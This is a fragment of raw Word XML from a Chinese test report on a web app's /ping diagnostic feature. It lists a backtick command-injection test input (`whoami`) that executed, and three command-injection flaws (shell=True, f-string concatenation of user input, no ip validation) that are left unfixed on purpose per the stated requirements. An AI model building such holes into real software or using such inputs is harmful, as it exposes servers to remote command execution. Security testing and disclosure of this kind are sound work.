          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>反引号注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>`whoami`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>替换执行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T-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>内网 ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>127.0.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>正常返回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  <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="850"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>未登录访问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1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>302 跳转</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>七、漏洞汇总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漏洞名称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发现位置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134"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CE-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>shell=True 启用 shell 解释器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701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/ping 第658行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>📋 未修复（需求定义）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CE-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>f-string 拼接用户输入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701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/ping 第655-656行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>📋 未修复（需求定义）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CE-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ip 参数无输入校验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701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/ping 第648行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>📋 未修复（需求定义）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>说明：以上三个漏洞按照需求要求故意保留。需求明确要求"使用 shell=True"、"使用 f-string 拼接"、"不对 ip 做任何过滤"。修复方案已在第五章中完整给出，开发者可根据实际安全需求选择性实施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>八、Git 提交记录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提交哈希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提交信息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涉及文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>9f6c10e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>feat: 新增Ping网络诊断功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>app.py, ping.html, base.html, index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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报告生成日期：2026-07-13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